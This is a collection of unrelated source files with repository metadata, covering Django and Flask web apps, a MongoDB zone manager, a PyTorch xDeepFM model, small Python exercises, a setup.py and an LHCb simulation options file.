| 2020-06-02T07:41:53.608742 | 2019-11-13T08:31:57 | 2019-11-13T08:31:57 | 191,085,178 | 3 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 171 |
py
|
import math
a = math.atan(2/3)
c = math.atan(1)
print(c*180/math.pi)
print(a*180/math.pi)
#theta1 =math.tanh((a))
#print(theta1)
b = math.atan(6/2)
print(b*180/math.pi)
|
[
"[email protected]"
] | |
cce1e5cc0fba01f33051132e3981e03cec379801
|
a070182e6443995031340802e74d1e65a85bdca3
|
/bluelog/utils.py
|
4975d944d9c5eebe4486d47ab3fea78ee7fa681c
|
[] |
no_license
|
huazhicai/bluelog
|
f86a042a5f3ada46515920c45a0b1452a40d4ad9
|
c2a46ac25cbba4ecf7d4e0985ef9010ddae34c01
|
refs/heads/master
| 2020-04-04T16:33:27.910658 | 2019-01-03T09:59:52 | 2019-01-03T09:59:52 | 156,082,797 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 670 |
py
|
try:
from urlparse import urlparse, urljoin
except ImportError:
from urllib.parse import urlparse, urljoin
from flask import request, redirect, url_for
def is_safe_url(target):
ref_url = urlparse(request.host_url)
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc
def redirect_back(default='blog.index', **kwargs):
for target in request.args.get('next'), request.referrer:
if not target:
continue
if is_safe_url(target):
return redirect(target)
return redirect(url_for(default, **kwargs))
|
[
"[email protected]"
] | |
d69a39808d6f68572bc01c15f5e876462397f0eb
|
4dac40a30e7bbb86ab829fed0cb6f12ff7fa0216
|
/djwiki/wiki/models.py
|
0e7d732c83f68d3e3e9fb72063d8346168ff24ae
|
[] |
no_license
|
gzpgg3x/pythonDiary
|
cc039b716c810f99d5a12b0f4167a711cd6ea18f
|
0c3af53dc635d5ff40adad89dce146d6684e162e
|
refs/heads/master
| 2021-01-10T19:55:41.130511 | 2013-04-21T04:37:10 | 2013-04-21T04:37:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 201 |
py
|
from django.db import models
class Page(models.Model):
name = models.CharField(max_length=40, unique=True)
content = models.TextField()
def __unicode__(self):
return self.name
|
[
"[email protected]"
] | |
26952bdc611861509bd368811c1b243e394f7d45
|
a32049cdf8cb3403e8e54ddd661f8bb506cca99b
|
/first_project/first_app/urls.py
|
f627fd5ffdf7c929f3138c22f3c628b8dc0cf27b
|
[] |
no_license
|
akhileshvvn/django-deployment-example
|
5a3beb8205f2905c99808e983baaf0f8a7a23772
|
45317bb6166527054541e52c8a986f44342ea958
|
refs/heads/master
| 2022-04-15T08:17:02.615307 | 2020-04-11T07:54:19 | 2020-04-11T07:54:19 | 254,815,719 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 501 |
py
|
from django.urls import path,re_path
from django.conf.urls import url
from . import views
#TEMPLATE TAGGING
app_name = 'first_app'
urlpatterns = [
re_path(r'^index/', views.index, name=''),
re_path(r'formindex/',views.form_name_view,name='form_name'),
re_path(r'^relative/$',views.relative,name = 'relative'),
re_path(r'^other/$',views.other,name='other'),
re_path(r'^register/$',views.register,name='register'),
re_path(r'^user_login/$',views.user_login,name='user_login')
]
|
[
"[email protected]"
] | |
7e5fc8246ba12f67b9efe8fe1433a80bbd6460fe
|
d4fe66ef7b5bc1745aeb4054b30575fb25a053f4
|
/setup.py
|
d838e226a7de7b9cd782061fb6f64b3134bc06cc
|
[
"Apache-2.0"
] |
permissive
|
jay-johnson/antinex-client
|
796c753bc9df8498f25dca994920b26d8828a940
|
76a3cfbe8a8d174d87aba37de3d8acaf8c4864ba
|
refs/heads/master
| 2021-04-15T15:55:39.670061 | 2020-09-04T19:49:15 | 2020-09-04T19:49:15 | 126,577,469 | 6 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,053 |
py
|
import os
import sys
import warnings
import unittest
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', "Arguments to pass to pytest")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ''
def run_tests(self):
import shlex
# import here, cause outside the eggs aren't loaded
import pytest
errno = pytest.main(shlex.split(self.pytest_args))
sys.exit(errno)
"""
https://packaging.python.org/guides/making-a-pypi-friendly-readme/
check the README.rst works on pypi as the
long_description with:
twine check dist/*
"""
long_description = open('README.rst').read()
cur_path, cur_script = os.path.split(sys.argv[0])
os.chdir(os.path.abspath(cur_path))
install_requires = [
"colorlog",
"coverage",
"flake8",
"matplotlib",
"numpy",
"pandas",
"pep8",
"pipenv",
"pycodestyle",
"pylint",
"recommonmark",
"requests",
"seaborn",
"sphinx",
"sphinx-autobuild",
"sphinx_rtd_theme",
"spylunking",
"tox",
"tqdm",
"unittest2",
"mock"
]
if sys.version_info < (3, 5):
warnings.warn(
"Less than Python 3.5 is not supported.",
DeprecationWarning)
# Do not import antinex_client module here, since deps may not be installed
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "antinex_client"))
setup(
name="antinex-client",
cmdclass={"test": PyTest},
version="1.3.6",
description=("AntiNex Python client"),
long_description_content_type='text/x-rst',
long_description=long_description,
author="Jay Johnson",
author_email="[email protected]",
url="https://github.com/jay-johnson/antinex-client",
packages=[
"antinex_client",
"antinex_client.scripts",
"antinex_client.log"
],
package_data={},
install_requires=install_requires,
test_suite="setup.antinex_client_test_suite",
tests_require=[
"pytest"
],
scripts=[
"./antinex_client/scripts/ai",
"./antinex_client/scripts/ai_env_predict.py",
"./antinex_client/scripts/ai_get_prepared_dataset.py",
"./antinex_client/scripts/ai_get_job.py",
"./antinex_client/scripts/ai_get_results.py",
"./antinex_client/scripts/ai_prepare_dataset.py",
"./antinex_client/scripts/ai_train_dnn.py"
],
use_2to3=True,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
])
|
[
"[email protected]"
] | |
63f124f199d2e152e2fc67618693c424f3febbb7
|
d458b72b4d0e5c51446bb8b9f8a6276015dfb594
|
/math/0x02-calculus/10-matisse.py
|
88cf330d9c797d23e8f981fda83e54f60879e7f5
|
[] |
no_license
|
mecomontes/Machine-Learning-projects
|
d6588cfaa7d020d3fae0fb74f6550c9e84500578
|
50e1828b58bb58eecfd3a142501b37fe701f4e49
|
refs/heads/main
| 2023-07-14T12:30:19.792332 | 2021-08-29T15:33:16 | 2021-08-29T15:33:16 | 376,129,791 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 808 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 8 9:34:16 2020
@author: Robinson Montes
"""
def poly_derivative(poly):
"""
Function that find the derivate of a polynomial
Arguments:
- poly(list of integers): polynomial to calculate the derivate
Return:
List of coefficients representing the derivative of the polynomial
"""
if poly is None or poly == [] or type(poly) is not list:
return None
derivate = []
i = 0
while i < len(poly):
if type(poly[i]) not in (int, float):
return None
elif len(poly) == 1:
derivate.append(0)
else:
if i == 0:
i += 1
continue
derivate.append(poly[i]*i)
i += 1
return derivate
|
[
"[email protected]"
] | |
b49d41c660d323470c0b91f8b0625757281eccd0
|
1be96ee96f3b33469ca073c4f32884cb7230106b
|
/python3_cron_scripts/libs3/ZoneManager.py
|
0531dbedb4a08f885bbf76e4b6fa355e672c65fc
|
[
"Apache-2.0"
] |
permissive
|
vishnurajkv/Marinus
|
3305478038fba8b0ea15dafa2219df9f4df21e9b
|
331ba1dc2e99ae99df6c9d93063a852eec41d578
|
refs/heads/master
| 2020-06-29T10:58:50.196807 | 2019-07-26T20:48:47 | 2019-07-26T20:48:47 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,583 |
py
|
#!/usr/bin/python3
# Copyright 2018 Adobe. All rights reserved.
# This file is licensed to you under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. You may obtain a copy
# of the License at http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
# OF ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
"""
This class mostly exists because almost every script needs to do a get_distinct_zones
Having it centralized, means that the included and excluded status' can be managed in one place.
"""
from pymongo import MongoClient
from datetime import datetime
from tld import get_fld
class ZoneManager(object):
# A status of confirmed typically means it was entered by a human
CONFIRMED = "confirmed"
# A status of unconfirmed means that it was added via automation
# It has not been revied by a human
UNCONFIRMED = "unconfirmed"
# A status of false positive means that a human identified that automation made a mistake
FALSE_POSITIVE = "false_positive"
# A status of expired means that the automation believes that the domain is no longer registered
EXPIRED = "expired"
# The MongoConnector
mongo_connector = None
# The zone collection
zone_collection = None
def __init__(self, mongo_connector):
"""
Initialize the MongoDB Connector
"""
self.mongo_connector = mongo_connector
self.zone_collection = mongo_connector.get_zone_connection()
def _check_valid_status(self, status):
if status != ZoneManager.EXPIRED and status != ZoneManager.FALSE_POSITIVE and \
status != ZoneManager.CONFIRMED and status!= ZoneManager.UNCONFIRMED:
print("ERROR: Bad status value")
return False
return True
@staticmethod
def get_distinct_zones(mongo_connector, includeAll = False):
"""
This is the most common usage of get zones where the caller wants just the list of
active zones.
This returns the list of zones as an array of strings rather than the complete JSON objects
"""
zones_collection = mongo_connector.get_zone_connection()
if includeAll:
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone')
else:
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone', {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone.find(".") >= 0:
zones.append(zone)
return zones
@staticmethod
def get_reversed_zones(mongo_connector):
"""
Retrieve the list of active zones and then reverse them to match the Common Crawl format
"""
zones_collection = mongo_connector.get_zone_connection()
zone_results = mongo_connector.perform_distinct(zones_collection, 'zone', {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone.find("."):
zone_parts = zone.split(".")
# The vertices.txt entries from common_crawl are in reverse order (e.g. org.example.www)
# To string match faster, the zones are stored in a reverse format prior to matching.
# This avoids having to reverse each entry in the file which is less efficient.
rev_zone = ""
for part in zone_parts:
rev_zone = part + "." + rev_zone
rev_zone = rev_zone[:-1]
zones.append(rev_zone)
return zones
@staticmethod
def get_zones_by_source(mongo_connector, source, includeAll=False):
"""
Returns a list of zones based on the provided reporting source
"""
zone_collection = mongo_connector.get_zone_connection()
if includeAll:
zones = mongo_connector.perform_distinct(zone_collection, 'zone', {
'reporting_sources.source': source})
else:
zones = mongo_connector.perform_distinct(zone_collection, 'zone', {
'reporting_sources.source': source,
'status': {'$nin': [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
return zones
@staticmethod
def get_zones(mongo_connector, includeAll=False):
"""
This is will return the full zones object for all active zones.
This returns the complete json objects for the matching descriptions
"""
zones_collection = mongo_connector.get_zone_connection()
if includeAll:
zone_results = mongo_connector.perform_find(zones_collection, {})
else:
zone_results = mongo_connector.perform_find(zones_collection, {'status': {"$nin": [ZoneManager.FALSE_POSITIVE, ZoneManager.EXPIRED]}})
zones = []
for zone in zone_results:
if zone['zone'].find(".") >= 0:
zones.append(zone)
return zones
@staticmethod
def get_root_domain(value, zone=None):
"""
Get the root domain (FLD) for the provided value
"""
res = get_fld(value, fix_protocol=True, fail_silently=True)
if res is None:
return zone
return res
def get_zone(self, zone):
"""
Fetch the full individual zone record.
This is not a staticmethod since it would probably be called repeatedly.
"""
return self.mongo_connector.perform_find(self.zone_collection, {'zone': zone})
def get_zones_by_status(self, status):
"""
This returns the list of zones associated with the provided status.
This returns the list of zones as an array of strings rather than the complete JSON objects
"""
if not self._check_valid_status(status):
return
zone_results = self.mongo_connector.perform_distinct(self.zone_collection, 'zone', {'status': status})
zones = []
for zone in zone_results:
if zone.find(".") >= 0:
zones.append(zone)
return zones
def set_status(self, zone, status, caller):
"""
Set a zone to expired.
"""
if self.zone_collection.find({'zone': zone}).count() == 0:
print("ERROR: Invalid zone!")
return
if status != ZoneManager.EXPIRED and status != ZoneManager.FALSE_POSITIVE and \
status != ZoneManager.CONFIRMED and status!= ZoneManager.UNCONFIRMED:
print("ERROR: Bad status value!")
return
if caller is None or caller == "":
print("ERROR: Please provide a caller value!")
return
now = datetime.now()
note = caller + " set to " + status + " on " + str(now)
self.zone_collection.update({"zone": zone}, {"$set": {"status": status, "updated": now}, "$addToSet": {"notes": note}})
def add_note(self, zone, note):
"""
In the future, there should probably be restrictions on note length.
For now, it is not set until more information on usage is available.
"""
self.zone_collection.update({"zone": zone}, {"$addToSet": {"notes": note}})
|
[
"[email protected]"
] | |
33302759c219b9a3b1fe2347ecb502a4dace1d4d
|
fc0150b1fd6ba0efd6746a34ffa8cba01640d10e
|
/Programming Basics with Python - април 2018/04. Complex-Conditions/02. Small Shop.py
|
f98d0d795257e24d58dfce9db983b1cd9ca6dbeb
|
[] |
no_license
|
vgrozev/SofUni_Python_hmwrks
|
7554d90f93b83d58e386c92dac355573c8cda848
|
b10a941a0195ea069e698b319f293f5b4a660547
|
refs/heads/master
| 2021-06-08T19:40:27.009205 | 2019-11-24T17:19:31 | 2019-11-24T17:19:31 | 95,629,443 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,132 |
py
|
product = input().lower()
town = input().lower()
quantity = float(input())
total = 0.0
if town == 'sofia':
if product == 'coffee':
total = quantity * 0.50
elif product == 'peanuts':
total = quantity * 1.60
elif product == 'beer':
total = quantity * 1.20
elif product == 'water':
total = quantity * 0.80
else: # product == 'sweets'
total = quantity * 1.45
elif town == 'plovdiv':
if product == 'coffee':
total = quantity * 0.40
elif product == 'peanuts':
total = quantity * 1.50
elif product == 'beer':
total = quantity * 1.15
elif product == 'water':
total = quantity * 0.70
else: # product == 'sweets'
total = quantity * 1.30
else: # town == 'Varna'
if product == 'coffee':
total = quantity * 0.45
elif product == 'peanuts':
total = quantity * 1.55
elif product == 'beer':
total = quantity * 1.10
elif product == 'water':
total = quantity * 0.70
else: # product == 'sweets'
total = quantity * 1.35
print("{0:.2f}".format(total))
|
[
"[email protected]"
] | |
2d6e5705b0d6fc9452a7eef4f715005355db0acf
|
0067290f8a2c5c367eee2e76f7ec743719d5b59c
|
/one/two/migrations/0002_auto_20170802_1924.py
|
02ba77ac66799d0a3867254c03ad5115c12deb5d
|
[] |
no_license
|
8880/Django
|
d81da8f410845676606eb148a609f56792a14b1b
|
469fe07475c2f7c6e2d1ba1e2119b59550f154e6
|
refs/heads/master
| 2021-01-16T17:54:58.393384 | 2017-08-19T02:55:11 | 2017-08-19T02:55:11 | 100,019,134 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,264 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-02 11:24
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('two', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField(verbose_name='\u8bc4\u8bba\u5185\u5bb9')),
('username', models.CharField(blank=True, max_length=30, null=True, verbose_name='\u7528\u6237\u540d')),
('email', models.EmailField(blank=True, max_length=50, null=True, verbose_name='\u90ae\u7bb1\u5730\u5740')),
('url', models.URLField(blank=True, max_length=100, null=True, verbose_name='\u4e2a\u4eba\u7f51\u9875\u5730\u5740')),
('date_publish', models.DateTimeField(auto_now_add=True, verbose_name='\u53d1\u5e03\u65f6\u95f4')),
],
options={
'verbose_name': '\u8bc4\u8bba',
'verbose_name_plural': '\u8bc4\u8bba',
},
),
migrations.AlterModelOptions(
name='article',
options={'ordering': ['-id'], 'verbose_name': '\u6587\u7ae0', 'verbose_name_plural': '\u6587\u7ae0'},
),
migrations.AddField(
model_name='comment',
name='article',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='two.Article', verbose_name='\u6587\u7ae0'),
),
migrations.AddField(
model_name='comment',
name='pid',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='two.Comment', verbose_name='\u7236\u7ea7\u8bc4\u8bba'),
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='\u7528\u6237'),
),
]
|
[
"klous530.outlook.com"
] |
klous530.outlook.com
|
a4e3c2a78a101ae2c35ecf31315de44d777b253f
|
89cd8b77ad5171c336cc60b2133fe6468a6cb53f
|
/Module01_CZ/day7_data_struct_str/04-代码/day7/125_字符串高级操作(判断型).py
|
8f356536eabd5e44cafbc8624e413494095895a0
|
[
"MIT"
] |
permissive
|
fenglihanxiao/Python
|
75178f6b6b0c53345e1ed54226ea645216572d6c
|
872baf3a3a5ee42740161152605ca2b1ddf4cd30
|
refs/heads/master
| 2021-05-23T18:49:20.656433 | 2020-04-29T01:06:21 | 2020-04-29T01:06:21 | 253,199,073 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 272 |
py
|
"""
演示字符串判断型操作
"""
# str1 = "\n"
# print(str1.islower())
# print(str1.isupper())
name = "张三丰"
print(name.startswith("张三"))
filename="1.jpge"
if filename.endswith(".jpg") or filename.endswith(".png") :
print("该文件是一个图片")
|
[
"[email protected]"
] | |
a268ef38a2861b114ef4f65c5e31730ade40cc92
|
7f68bbb3fd328a4d6bbabecb44305987d8cbbfc4
|
/django/django-intro/home/workspace/PROJECT8/movies/forms.py
|
96b211b33850d9d51473be7e05a26ff57cb8c511
|
[] |
no_license
|
seunghoon2334/TIL
|
c84f9f9e68c8ccc7a1625222fe61f40739774730
|
51cfbad2d9b80a37b359716fca561c2a5c5b48b3
|
refs/heads/master
| 2022-12-18T18:20:19.210587 | 2019-11-26T03:14:23 | 2019-11-26T03:14:23 | 162,101,369 | 0 | 0 | null | 2022-11-22T03:59:16 | 2018-12-17T08:51:53 |
C
|
UTF-8
|
Python
| false | false | 491 |
py
|
from django import forms
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from .models import Movie
# modelform
class MovieForm(forms.ModelForm):
class Meta:
model = Movie
fields = '__all__'
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.helper = FormHelper()
self.helper.form_method = 'POST'
self.helper.add_input(Submit('Submit', '제출!'))
|
[
"[email protected]"
] | |
5837d24747eb111593c4fdc4fdb16c2048efb91e
|
d3e6d6555b0314936902727af36de2f1b7432bf8
|
/linked-list-cycle/linked-list-cycle.py
|
af4d1032682c25c061b7019097dc1288fceab653
|
[] |
no_license
|
fly2rain/LeetCode
|
624b1e06e1aa3174dfb5c81834b58cc8fd7ad073
|
4ddb5a051c6e2051f016a675fd2f5d566c800c2a
|
refs/heads/master
| 2021-01-18T03:12:22.402044 | 2015-12-28T04:31:19 | 2015-12-28T04:31:19 | 85,842,050 | 0 | 1 | null | 2017-03-22T15:05:20 | 2017-03-22T15:05:19 | null |
UTF-8
|
Python
| false | false | 771 |
py
|
from utils import ListNode
class Solution(object):
def hasCycle(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if not head:
return False
prev, current = head, head.next
head.next = None
while current:
if current == head:
return True
next = current.next
current.next = prev
prev, current = current, next
return False
if __name__ == '__main__':
head = ListNode.build_linked_list([1, 2, 3, 4, 5])
head.next.next.next.next = head.next.next
print Solution().hasCycle(head)
head2 = ListNode.build_linked_list([1, 2, 3, 4, 5])
print Solution().hasCycle(head2)
print Solution().hasCycle(None)
|
[
"[email protected]"
] | |
d3ef5ccaa99988559bd5fde97a0082c970a270a1
|
1548ce77537dcd50ab04b0eaee050b5d30553e23
|
/autotabular/algorithms/ctr/xdfm.py
|
003e7cba0a5433e271cb0403bed753da731ebcad
|
[
"Apache-2.0"
] |
permissive
|
Shamoo100/AutoTabular
|
4a20e349104246bf825ebceae33dca0a79928f2e
|
7d71bf01d2b7d84fcf5f65c9f45c5cea1255d8a2
|
refs/heads/main
| 2023-08-13T21:34:34.329888 | 2021-10-02T07:06:00 | 2021-10-02T07:06:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,338 |
py
|
import torch
from autotabular.algorithms.ctr.layer import CompressedInteractionNetwork, FeaturesEmbedding, FeaturesLinear, MultiLayerPerceptron
class ExtremeDeepFactorizationMachineModel(torch.nn.Module):
"""A pytorch implementation of xDeepFM.
Reference:
J Lian, et al. xDeepFM: Combining Explicit and Implicit Feature Interactions for Recommender Systems, 2018.
"""
def __init__(self,
field_dims,
embed_dim,
mlp_dims,
dropout,
cross_layer_sizes,
split_half=True):
super().__init__()
self.embedding = FeaturesEmbedding(field_dims, embed_dim)
self.embed_output_dim = len(field_dims) * embed_dim
self.cin = CompressedInteractionNetwork(
len(field_dims), cross_layer_sizes, split_half)
self.mlp = MultiLayerPerceptron(self.embed_output_dim, mlp_dims,
dropout)
self.linear = FeaturesLinear(field_dims)
def forward(self, x):
"""
:param x: Long tensor of size ``(batch_size, num_fields)``
"""
embed_x = self.embedding(x)
x = self.linear(x) + self.cin(embed_x) + self.mlp(
embed_x.view(-1, self.embed_output_dim))
return torch.sigmoid(x.squeeze(1))
|
[
"[email protected]"
] | |
ba4a59497f41ffefe8c698f0a65012b2d35d88e6
|
b5aeb0f8b8efc77d77842237a80cce90e529ac5f
|
/config/settings.py
|
04b0faaaab467f76b64edc86c9631e42ab3f4de5
|
[] |
no_license
|
Pillin/POC-Django-Cooker
|
b078502d403a90cc57c4691265235ce855c8d75e
|
e6ad88564d3045af4a418234a927970f928e3c58
|
refs/heads/master
| 2022-12-12T15:02:41.410674 | 2019-09-30T03:41:28 | 2019-09-30T03:41:28 | 210,078,139 | 1 | 0 | null | 2022-12-08T05:22:06 | 2019-09-22T02:13:33 |
Python
|
UTF-8
|
Python
| false | false | 4,361 |
py
|
"""
Django settings for nora project.
Generated by 'django-admin startproject' using Django 2.2.1.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ENV = environ.Env()
ENV.read_env(os.path.join(BASE_DIR, '.env'))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = ENV('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = ENV('DEBUG')
ALLOWED_HOSTS = []
BASE_URL = ENV('BASE_URL')
# Application definition
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'django_extensions',
'users',
'commons',
'meals',
'tags',
'plates',
'menus',
'distributions',
'deliveries'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.BasicAuthentication',
),
}
# Authentication Settings
AUTH_USER_MODEL = 'users.User'
ROOT_URLCONF = 'config.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
]
},
},
]
WSGI_APPLICATION = 'config.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': ENV.db()
}
DATABASES['default']['TEST'] = {
'NAME': 'nora_test'
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'es-cl'
TIME_ZONE = 'Etc/GMT+4'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
CSRF_USE_SESSIONS = True
STATIC_URL = '/static/'
LOGIN_REDIRECT_URL = '/home/'
LOGIN_URL = '/login/'
CSRF_COOKIE_SECURE = True
DATE_FORMAT = '%d/%m/%Y'
TIME_FORMAT = '%H:%M:%S'
SLACK_SERVICE_URL = 'https://hooks.slack.com/services/'
# CELERY COMFIGURATION
BROKER_URL = 'redis://localhost:6379'
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TIMEZONE = 'Etc/GMT+4'
CELERY_ALWAYS_EAGER = False
|
[
"[email protected]"
] | |
e569fc7fc6e893e1d228b1d7e4971dcb65008fb8
|
45cc3880f3444276cebb0a7f91d3b146cd27b9d0
|
/beeprint/printer.py
|
63fe4de1510c7695ba066e8687e34780d93a7b3e
|
[] |
no_license
|
aijikl/beeprint
|
056aa84ff73da93c50143c83bed0fdf54bd37ee5
|
0380a942c0ad56ab219a51c728b4244a9b49f405
|
refs/heads/master
| 2021-01-20T04:25:26.858124 | 2017-04-04T06:50:36 | 2017-04-04T06:50:36 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,603 |
py
|
# -*- coding:utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import division
import sys
import traceback
import types
import inspect
from io import StringIO
from .utils import pyv
if pyv == 2:
# avoid throw [UnicodeEncodeError: 'ascii' codec can't encode characters]
# exceptions, without these lines, the sys.getdefaultencoding() returns ascii
from imp import reload
reload(sys)
sys.setdefaultencoding('utf-8')
from . import constants as C
from .utils import print_exc_plus
from .models.block import Block, Context
from .config import Config
from .debug_kit import print_obj_path
def pp(o, output=True, max_depth=5, indent=2, width=80, sort_keys=True, config=None, **kwargs):
"""print data beautifully
"""
if config:
config = config.clone()
else:
config = Config()
assert max_depth > 0
config.max_depth = max_depth
assert indent > 0
config.indent_char = u' '*indent
assert width >= 0
config.string_break_width = width
config.dict_ordered_key_enable = bool(sort_keys)
for k, v in kwargs.items():
if getattr(config, k):
setattr(config, k, v)
if not output:
config.stream = None
try:
res = str(Block(config, Context(obj=o)))
except:
print_obj_path()
raise
if config.debug_level != 0:
if config.debug_delay:
print(config.debug_stream.getvalue())
if not output:
return res
|
[
"[email protected]"
] | |
fcaf8123dd2fd421f5fc4ee011401898730fd1c1
|
be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1
|
/Gauss_v45r10p1/Gen/DecFiles/options/11114095.py
|
04981cbb389888968150d038dc6a792df1581176
|
[] |
no_license
|
Sally27/backup_cmtuser_full
|
34782102ed23c6335c48650a6eaa901137355d00
|
8924bebb935b96d438ce85b384cfc132d9af90f6
|
refs/heads/master
| 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,637 |
py
|
# file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/11114095.py generated: Wed, 25 Jan 2017 15:25:18
#
# Event Type: 11114095
#
# ASCII decay Descriptor: [B0 -> K+ pi- (Higgs0 -> mu+ mu-)]cc
#
from Configurables import Generation
Generation().EventType = 11114095
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bd_KpiDarkBoson2MuMu,m=250MeV,t=100ps,DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 511,-511 ]
from Gauss.Configuration import *
from Configurables import LHCb__ParticlePropertySvc as ParticlePropertySvc
